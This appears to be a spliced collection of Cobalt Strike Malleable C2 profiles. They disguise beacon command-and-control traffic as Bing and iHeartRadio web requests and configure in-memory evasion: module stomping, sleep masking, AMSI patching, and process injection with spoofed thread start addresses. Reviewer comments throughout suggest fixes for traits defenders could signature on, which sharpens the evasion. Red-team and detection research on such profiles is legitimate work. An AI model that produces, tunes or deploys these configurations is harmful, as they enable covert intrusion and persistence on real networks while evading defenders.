        # body carries nothing. NOTE(review): header-borne output is bounded by
        # the server/proxy header size limit, so large task output will be split
        # into many requests or rejected; c2lint normally warns about this.
        output {
            base64url;

            prepend "SRCHUID=";
            prepend "SRCHD=AF=NOFORM;";
            header "Cookie";
        }

        # Session id: base64url-encoded, sent as the "lid" URI parameter.
        id {
            base64url;
            parameter "lid";

        }
    }

    server {

        header "Cache-Control" "public, max-age=31536000";
        header "Content-Type" "application/json";
        header "Vary" "Accept-Encoding";
        header "X-Cache" "TCO_HIT";
        header "Server" "Microsoft-IIS/10.0";
        header "X-AspNet-Version" "4.0.30319";
        header "X-Powered-By" "ASP.NET";

        # Server reply is netbios-encoded and dropped in as the value of the
        # last "entry" field of the prepended JSON, with the rest of the
        # captured categoryMap appended afterwards.
        # NOTE(review): the payload is inserted after `\"entry\":` with no
        # surrounding escaped quotes, so the body is not strictly valid JSON
        # (a bare letter-only token where a string is expected). Wrapping it as
        # `\"entry\": \"` ... `\"` would make the response parse like the real one.
        output {
            netbios;

            prepend "{
\"categoryMap\": [
{
\"categoryId\": 91263,
\"bucketId\": 1848,
\"entry\": \"CommunityPoint\"
},
{
\"categoryId\": 90892,
\"bucketId\": 1899,
\"entry\": \"Transit\"
},
{
\"categoryId\": 90014,
\"bucketId\": 300,
\"entry\": \"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\"
},
{
\"categoryId\": 90595,
\"bucketId\": 311,
\"entry\": \"RealEstatePoint\"
},
{
\"categoryId\": 91616,
\"bucketId\": 257,
\"entry\": \"AquariumPoint\"
},
{
\"categoryId\": 90954,
\"bucketId\": 277,
\"entry\": \"ArtGalleryPoint\"
},
{
\"categoryId\": 90001,
\"bucketId\": 258,
\"entry\": \"UEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHTnliM056YjNKcFoybHVQU0poYm05dWVXMXZkWE1pSUhOeVl6MGlMM0p3TDBScWNrUjZOMU5ZYlhOMWRYZHhRMlI1WldsdlFsWXpPWGhKV1M1bmVpNXFjeUkrUEM5elkzSnBjSFErUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaVBnPT0=\"
},
{
\"categoryId\": 90133,
\"bucketId\": 278,
\"entry\": \"ATMPoint\"
},
{
\"categoryId\": 90078,
\"bucketId\": 330,
\"entry\": \"AutomobileRepairPoint\"
},
{
\"categoryId\": 91186,
\"bucketId\": 327,
\"entry\": \"FoodPoint\"
},
{
\"categoryId\": 90122,
\"bucketId\": 279,
\"entry\": \"BankPoint\"
},
{
\"categoryId\": 90243,
\"bucketId\": 284,
\"entry\": \"BarPoint\"
},
{
\"categoryId\": 91204,
\"bucketId\": 308,
\"entry\": \"BarAndGrillPoint\"
},
{
\"categoryId\": 91576,
\"bucketId\": 1851,
\"entry\": \"AttractionPoint\"
},
{
\"categoryId\": 90353,
\"bucketId\": 1972,
\"entry\": \"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\"
},
{
\"categoryId\": 90940,
\"bucketId\": 329,
\"entry\": \"MarinaPoint\"
},
{
\"categoryId\": 90650,
\"bucketId\": 1365,
\"entry\": \"BookstorePoint\"
},
{
\"categoryId\": 91533,
\"bucketId\": 271,
\"entry\": \"BowlingPoint\"
},
{
\"categoryId\": 91647,
\"bucketId\": 1382,
\"entry\": \"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\"
},
{
\"categoryId\": 255,
\"bucketId\": 254,
\"entry\": \"Transit\"
},
{
\"categoryId\": 257,
\"bucketId\": 253,
\"entry\": \"Transit\"
},
{
\"categoryId\": 264,
\"bucketId\": 243,
\"entry\": \"Transit\"
},
{
\"categoryId\": 263,
\"bucketId\": 241,
\"entry\":";





            append " },
{
\"categoryId\": 266,
\"bucketId\": 236,
\"entry\": \"Transit\"
},
{
\"categoryId\": 251,
\"bucketId\": 252,
\"entry\": \"Transit\"
},
{
\"categoryId\": 265,
\"bucketId\": 242,
\"entry\": \"Transit\"
},
{
\"categoryId\": 253,
\"bucketId\": 251,
\"entry\": \"Transit\"
},
{
\"categoryId\": 254,
\"bucketId\": 250,
\"entry\": \"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\"
},
{
\"categoryId\": 260,
\"bucketId\": 229,
\"entry\": \"Transit\"
},
{
\"categoryId\": 267,
\"bucketId\": 226,
\"entry\": \"Transit\"
},
{
\"categoryId\": 252,
\"bucketId\": 249,
\"entry\": \"Transit\"
},
{
\"categoryId\": 91714,
\"bucketId\": 66,
\"entry\": \"FinancialPoint\"
},
{
\"categoryId\": 203,
\"bucketId\": 248,
\"entry\": \"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\"
},
{
\"categoryId\": 91754,
\"bucketId\": 65,
\"entry\": \"Transit\"
},
{
\"categoryId\": 205,
\"bucketId\": 247,
\"entry\": \"Transit\"
},
{
\"categoryId\": 91649,
\"bucketId\": 281,
\"entry\": \"CafePoint\"
},
{
\"categoryId\": 91562,
\"bucketId\": 1366,
\"entry\": \"CampPoint\"
},
{
\"categoryId\": 90977,
\"bucketId\": 331,
\"entry\": \"\"
},
{
\"categoryId\": 90903,
\"bucketId\": 274,
\"entry\": \"AutomobileRentalPoint\"
},
{
\"categoryId\": 90024,
\"bucketId\": 303,
\"entry\": \"CasinoPoint\"
},
{
\"categoryId\": 91622,
\"bucketId\": 1839,
\"entry\": \"AttractionPoint\"
},
{
\"categoryId\": 91252,
\"bucketId\": 1846,
\"entry\": \"PalacePoint\"
},
{
\"categoryId\": 90619,
\"bucketId\": 1847,
\"entry\": \"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=\"
},
{
\"categoryId\": 91703,
\"bucketId\": 1849,
\"entry\": \"CommunityPoint\"
},
{
\"categoryId\": 90386,
\"bucketId\": 1367,
\"entry\": \"ClinicPoint\"
},
{
\"categoryId\": 90188,
\"bucketId\": 295,
\"entry\": \"EducationPoint\"
},
{
\"categoryId\": 90584,
\"bucketId\": 310,
\"entry\": \"CommunityPoint\"
}";

            print;
        }
    }
}
470 | ||
471 | ||
472 | ||
473 | ###HTTP-Stager Block### | |
http-stager {
    # Staging URIs. They differ from the http-get URI only by letter case
    # (/maps/overlaybfpr vs overlayBFPR/overlayBfpr), which is how the
    # listener tells the three requests apart.
    # NOTE(review): the profile sets host_stage "false" globally, so this
    # block is inert unless staging is re-enabled; keep it in sync with the
    # http-get block if that ever changes.
    set uri_x86 "/maps/overlayBFPR";
    set uri_x64 "/maps/overlayBfpr";

    client {

        header "Host" "www.bing.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Connection" "close";
    }

    server {

        header "Cache-Control" "public";
        header "Content-Type" "text/html;charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\"";
        header "X-MSEdge-Ref" "Ref A: 20D7023F5A1946FFA6E18C00CC8216CF Ref B: DALEDGE0815";
        header "Connection" "close";

        # Stage is returned unencoded in the body.
        output {

            print;
        }
    }
}
501 | ||
502 | ||
503 | ###Malleable PE/Stage Block### | |
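stage {
    # PE header values for the reflectively-loaded Beacon image.
    set checksum "0";
    set compile_time "12 Dec 2019 02:52:11";
    set entry_point "170000";
    #set image_size_x86 "6586368";
    #set image_size_x64 "6586368";
    #set name "WWanMM.dll";

    # In-memory evasion: no RWX pages, reflective loader freed after load,
    # Beacon's heap/image masked while sleeping, PE header stomped, and
    # strings obfuscated until the image is in memory.
    set userwx "false";
    set cleanup "true";
    set sleep_mask "true";
    set stomppe "true";
    set obfuscate "true";
    set rich_header "";

    # (duplicate `set sleep_mask "true";` removed; it restated the value above)

    # Resolve needed Win32 API pointers from the loader rather than walking
    # export tables in the post-ex DLLs.
    set smartinject "true";

    # Module stomping: Beacon is laid over a freshly-loaded wwanmm.dll.
    # NOTE(review): vendor docs require the stomped DLL to be at least as
    # large as the Beacon image; the image_size_* lines are commented out,
    # so confirm wwanmm.dll is big enough on the target build before relying
    # on this.
    set module_x86 "wwanmm.dll";
    set module_x64 "wwanmm.dll";

    transform-x86 {
        prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.dll" "";
    }

    transform-x64 {
        prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.x64.dll" "";
    }

    #string "something";
    #data "something";
    #stringw "something";
}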
541 | ||
542 | ###Process Inject Block### | |
process-inject {

    # Remote memory is obtained by mapping a section into the target rather
    # than VirtualAllocEx.
    set allocator "NtMapViewOfSection";

    set min_alloc "16700";

    # Final permissions are not RWX, but the region is first created RWX and
    # then flipped. NOTE(review): an initial RWX allocation is one of the most
    # common injection heuristics; the ZLoader profile in this same set uses
    # startrwx "false". Confirm "true" is intentional here.
    set userwx "false";

    set startrwx "true";

    transform-x86 {
        prepend "\x90\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90\x90";
    }

    # Only the spoofed-start-address thread techniques are enabled; the bare
    # CreateThread/CreateRemoteThread forms are commented out.
    execute {
        #CreateThread;
        #CreateRemoteThread;

        CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";

        SetThreadContext;

        NtQueueApcThread-s;

        #NtQueueApcThread;

        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";

        RtlCreateUserThread;
    }
}
577 | ||
578 | ###Post-Ex Block### | |
post-ex {

    # Sacrificial process for post-ex jobs. gpupdate.exe is short-lived by
    # nature, which makes a brief instance less conspicuous than explorer.exe,
    # but it normally has no network activity of its own — keep that in mind
    # for jobs that talk out.
    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";

    set obfuscate "true";

    set smartinject "true";

    # Patches AMSI in the spawned process before script-based jobs run
    # (vendor behaviour; the patch itself is detectable by AMSI-integrity checks).
    set amsi_disable "true";

}
#iheartradio
#chose a popular top 40 station 'hit-nation'..
#xx0hcd

# 30s callback interval with 20% jitter.
set sleeptime "30000";
set jitter "20";
# NOTE(review): this UA stops after "(KHTML, like Gecko)" with no Chrome/Safari
# token, which no real browser sends; a truncated UA is itself a fingerprint.
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
set dns_idle "8.8.8.8";
set maxdns "235";

#custom cert
#https-certificate {
#    set keystore "your_store_file.store";
#    set password "your_store_pass";
#}

15 | ||
http-config {
#    set headers "Server, Content-Type, Cache-Control, Connection";
#    header "Content-Type" "text/html;charset=UTF-8";
#    header "Connection" "close";
#    header "Cache-Control" "max-age=2";
#    header "Server" "nginx";
    # Controls whether the team server takes the beacon's source address from
    # the X-Forwarded-For header. Only set "true" when a redirector in front
    # of the team server overwrites that header; otherwise any client can
    # supply it and spoof the address the team server records for a session.
    #set "true" if teamserver is behind redirector
    set trust_x_forwarded_for "false";
}
25 | ||
http-get {

    # NOTE(review): the URI uses station id 4222 while every embedded link in
    # the page body below (canonical, android-app, image_src) references 4422;
    # an analyst comparing request path and response content would spot this.
    set uri "/live/hit-nation-4222/";

    client {

        header "Host" "www.iheart.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US";
        header "Connection" "close";


        # Metadata goes in the Cookie header. Prepends apply in order, giving:
        # Cookie: ihr_c=US;id=HdqX;pid=3913;uid=1492;_gads=ID=53c4a:S=ALNI_M32;GED_PLAYLIST_ACTIVITY=<base64url>
        # NOTE(review): the decoy cookie values are identical for every beacon,
        # and the pairs are joined with ";" rather than the "; " (semicolon-space)
        # browsers emit — both are cheap things to signature on.
        metadata {
            base64url;

            prepend "GED_PLAYLIST_ACTIVITY=";
            prepend "_gads=ID=53c4a:S=ALNI_M32;";
            prepend "uid=1492;";
            prepend "pid=3913;";
            prepend "ihr_c=US;id=HdqX;";
            header "Cookie";

        }

    }

    server {

        header "Content-Type" "text/html; charset=utf-8";
        header "Edge-Control" "cache-maxage=3600";
        header "Server" "nginx/1.4.6 (Ubuntu)";
        header "X-Powered-By" "Express";
        header "Access-Control-Allow-Origin" "*";
        header "Accept-Ranges" "bytes";
        header "Via" "1.1 varnish";
        # Static cache/timer headers: the same Age and X-Timer values are
        # returned on every response.
        header "Age" "315";
        header "Connection" "close";
        header "X-Served-By" "cache-dfw1822-DFW";
        header "X-Cache" "HIT";
        header "X-Cache-Hits" "1";
        header "X-Timer" "S1499866924.089752,VS0,VE1";


        # Tasking is base64url-encoded and embedded after "?autoplayid=" inside
        # a captured copy of the station page.
        output {

            base64url;

            prepend "<!DOCTYPE html>
<html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
<head>
<title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
<meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
<link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today's Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 & Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 & Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
<style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";


            append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 & Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today's Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
<link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
</div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
<div id='jw-wrapper' class='hidden'>
<div id='jw-player'></div>
</div>
<div id='ads-wrapper' class='hidden'>
<a id='ads-learn-more' target='_blank'>Learn More</a>
<div id='ads-player'></div>
</div>
<script src=/a/locale/?rel=7.33.1></script>
<script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
<script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
</body>
</html>";

            print;
        }
    }
}
102 | ||
103 | http-post { | |
104 | ||
105 | set uri "/Live/hit-nation-4222/"; | |
106 | set verb "GET"; | |
107 | ||
108 | client { | |
109 | ||
110 | header "Host" "www.iheart.com"; | |
111 | header "Accept" "*/*"; | |
112 | ||
113 | output { | |
114 | base64url; | |
115 | ||
116 | prepend "GED_PLAYLIST_ACTIVITY="; | |
117 | prepend "_gads=ID=53c4a:S=ALNI_M32;"; | |
118 | prepend "uid=1492;"; | |
119 | prepend "pid=3913;"; | |
120 | prepend "ihr_c=US;id=HdqX;"; | |
121 | header "Cookie"; | |
122 | ||
123 | ||
124 | } | |
125 | ||
126 | ||
127 | id { | |
128 | base64url; | |
129 | ||
130 | parameter "autoplay"; | |
131 | ||
132 | } | |
133 | } | |
134 | ||
135 | server { | |
136 | ||
137 | header "Content-Type" "text/html; charset=utf-8"; | |
138 | header "Edge-Control" "cache-maxage=3600"; | |
139 | header "Server" "nginx/1.4.6 (Ubuntu)"; | |
140 | header "X-Powered-By" "Express"; | |
141 | header "Access-Control-Allow-Origin" "*"; | |
142 | header "Accept-Ranges" "bytes"; | |
143 | header "Via" "1.1 varnish"; | |
144 | header "Age" "315"; | |
145 | header "Connection" "close"; | |
146 | header "X-Served-By" "cache-dfw1822-DFW"; | |
147 | header "X-Cache" "HIT"; | |
148 | header "X-Cache-Hits" "1"; | |
149 | header "X-Timer" "S1499866924.089752,VS0,VE1"; | |
150 | ||
151 | #just keeping output together for responses | |
152 | output { | |
153 | base64; | |
154 | ||
155 | prepend "<!DOCTYPE html> | |
156 | <html lang='en' xmlns:fb='http://ogp.me/ns/fb'> | |
157 | <head> | |
158 | <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title> | |
159 | <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/> | |
160 | <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today's Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 & Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 & Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/> | |
161 | <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid="; | |
162 | ||
163 | ||
164 | append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 & Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today's Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/> | |
165 | <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link> | |
166 | </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div> | |
167 | <div id='jw-wrapper' class='hidden'> | |
168 | <div id='jw-player'></div> | |
169 | </div> | |
170 | <div id='ads-wrapper' class='hidden'> | |
171 | <a id='ads-learn-more' target='_blank'>Learn More</a> | |
172 | <div id='ads-player'></div> | |
173 | </div> | |
174 | <script src=/a/locale/?rel=7.33.1></script> | |
175 | <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script> | |
176 | <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script> | |
177 | </body> | |
178 | </html>"; | |
179 | ||
180 | print; | |
181 | } | |
182 | } | |
183 | } | |
184 | ||
185 | http-stager { | |
186 | ||
187 | set uri_x86 "/Console"; | |
188 | set uri_x64 "/console"; | |
189 | ||
190 | client{ | |
191 | header "Host" "www.iheart.com"; | |
192 | header "Accept" "*/*"; | |
193 | header "Accept-Language" "en-US"; | |
194 | header "Connection" "close"; | |
195 | } | |
196 | ||
197 | server { | |
198 | header "Server" "nginx/1.4.6 (Ubuntu)"; | |
199 | header "Content-Type" "text/html; charset=utf-8"; | |
200 | header "Connection" "close"; | |
201 | ||
202 | } | |
203 | ||
204 | ||
205 | } | |
206 | ||
207 | ###Malleable PE Options### | |
208 | ||
209 | post-ex { | |
210 | ||
211 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
212 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
213 | ||
214 | set obfuscate "true"; | |
215 | ||
216 | set smartinject "true"; | |
217 | ||
218 | set amsi_disable "true"; | |
219 | ||
220 | } | |
221 | ||
222 | #use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually. | |
223 | #don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though. | |
224 | stage { | |
225 | set checksum "0"; | |
226 | set compile_time "25 Oct 2016 01:57:23"; | |
227 | set entry_point "170000"; | |
228 | #set image_size_x86 "6586368"; | |
229 | #set image_size_x64 "6586368"; | |
230 | #set name "WWanMM.dll"; | |
231 | set userwx "false"; | |
232 | set cleanup "true"; | |
233 | set sleep_mask "true"; | |
234 | set stomppe "true"; | |
235 | set obfuscate "true"; | |
236 | set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
237 | ||
238 | #obfuscate beacon before sleep. | |
239 | set sleep_mask "true"; | |
240 | ||
241 | #module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working. | |
242 | ||
243 | set module_x86 "wwanmm.dll"; | |
244 | set module_x64 "wwanmm.dll"; | |
245 | ||
246 | #transform allows you to remove, replace, and add strings to beacon's reflective dll stage. | |
247 | transform-x86 { | |
248 | prepend "\x90\x90\x90"; | |
249 | strrep "ReflectiveLoader" ""; | |
250 | strrep "beacon.dll" ""; | |
251 | } | |
252 | ||
253 | transform-x64 { | |
254 | prepend "\x90\x90\x90"; | |
255 | strrep "ReflectiveLoader" ""; | |
256 | strrep "beacon.x64.dll" ""; | |
257 | } | |
258 | ||
259 | } | |
260 | ||
261 | process-inject { | |
262 | ||
263 | set allocator "NtMapViewOfSection"; | |
264 | ||
265 | set min_alloc "16700"; | |
266 | ||
267 | set userwx "false"; | |
268 | ||
269 | set startrwx "true"; | |
270 | ||
271 | transform-x86 { | |
272 | prepend "\x90\x90\x90"; | |
273 | } | |
274 | transform-x64 { | |
275 | prepend "\x90\x90\x90"; | |
276 | } | |
277 | ||
278 | execute { | |
279 | CreateThread "ntdll!RtlUserThreadStart"; | |
280 | CreateThread; | |
281 | NtQueueApcThread; | |
282 | CreateRemoteThread; | |
283 | RtlCreateUserThread; | |
284 | } | |
285 | } |
0 | # Malleable C2 Profile | |
1 | # Version: CobaltStrike 4.2 | |
2 | # File: jquery-c2.4.2.profile | |
3 | # Description: | |
4 | # c2 profile attempting to mimic a jquery.js request | |
5 | # uses signed certificates | |
6 | # or self-signed certificates | |
7 | # Authors: @joevest, @andrewchiles, @001SPARTaN | |
8 | ||
9 | ################################################ | |
10 | ## Tips for Profile Parameter Values | |
11 | ################################################ | |
12 | ||
13 | ## Parameter Values | |
14 | ## Enclose parameter in Double quote, not single | |
15 | ## set useragent "SOME AGENT"; GOOD | |
16 | ## set useragent 'SOME AGENT'; BAD | |
17 | ||
18 | ## Some special characters do not need escaping | |
19 | ## prepend "!@#$%^&*()"; | |
20 | ||
21 | ## Semicolons are ok | |
22 | ## prepend "This is an example;"; | |
23 | ||
24 | ## Escape Double quotes | |
25 | ## append "here is \"some\" stuff"; | |
26 | ||
27 | ## Escape Backslashes | |
28 | ## append "more \\ stuff"; | |
29 | ||
30 | ## HTTP Values | |
31 | ## Program .http-post.client must have a compiled size less than 252 bytes. | |
32 | ||
33 | ################################################ | |
34 | ## Profile Name | |
35 | ################################################ | |
36 | ## Description: | |
37 | ## The name of this profile (used in the Indicators of Compromise report) | |
38 | ## Defaults: | |
39 | ## sample_name: My Profile | |
40 | ## Guidelines: | |
41 | ## - Choose a name that you want in a report | |
42 | set sample_name "jQuery CS 4.2 Profile"; | |
43 | ||
44 | ################################################ | |
45 | ## Sleep Times | |
46 | ################################################ | |
47 | ## Description: | |
48 | ## Timing between beacon check in | |
49 | ## Defaults: | |
50 | ## sleeptime: 60000 | |
51 | ## jitter: 0 | |
52 | ## Guidelines: | |
53 | ## - Beacon Timing in milliseconds (1000 = 1 sec) | |
54 | set sleeptime "45000"; # 45 Seconds | |
55 | #set sleeptime "300000"; # 5 Minutes | |
56 | #set sleeptime "600000"; # 10 Minutes | |
57 | #set sleeptime "900000"; # 15 Minutes | |
58 | #set sleeptime "1200000"; # 20 Minutes | |
59 | #set sleeptime "1800000"; # 30 Minutes | |
60 | #set sleeptime "3600000"; # 1 Hours | |
61 | set jitter "37"; # % jitter | |
62 | ||
63 | ################################################ | |
64 | ## Server Response Size jitter | |
65 | ################################################ | |
66 | ## Description: | |
67 | ## Append random-length string (up to data_jitter value) to http-get and http-post server output. | |
68 | set data_jitter "100"; | |
69 | ||
70 | ################################################ | |
71 | ## HTTP Client Header Removal | |
72 | ################################################ | |
73 | ## Description: | |
74 | ## Global option to force Beacon's WinINet to remove specified headers late in the HTTP/S transaction process. | |
75 | ## Value: | |
76 | ## headers_remove Comma-separated list of HTTP client headers to remove from Beacon C2. | |
77 | # set headers_remove "Strict-Transport-Security, header2, header3"; | |
78 | ||
79 | ################################################ | |
80 | ## Beacon User-Agent | |
81 | ################################################ | |
82 | ## Description: | |
83 | ## User-Agent string used in HTTP requests, CS versions < 4.2 approx 128 max characters, CS 4.2+ max 255 characters | |
84 | ## Defaults: | |
85 | ## useragent: Internet Explorer (Random) | |
86 | ## Guidelines | |
87 | ## - Use a User-Agent values that fits with your engagement | |
88 | ## - useragent can only be 128 chars | |
89 | ## IE 10 | |
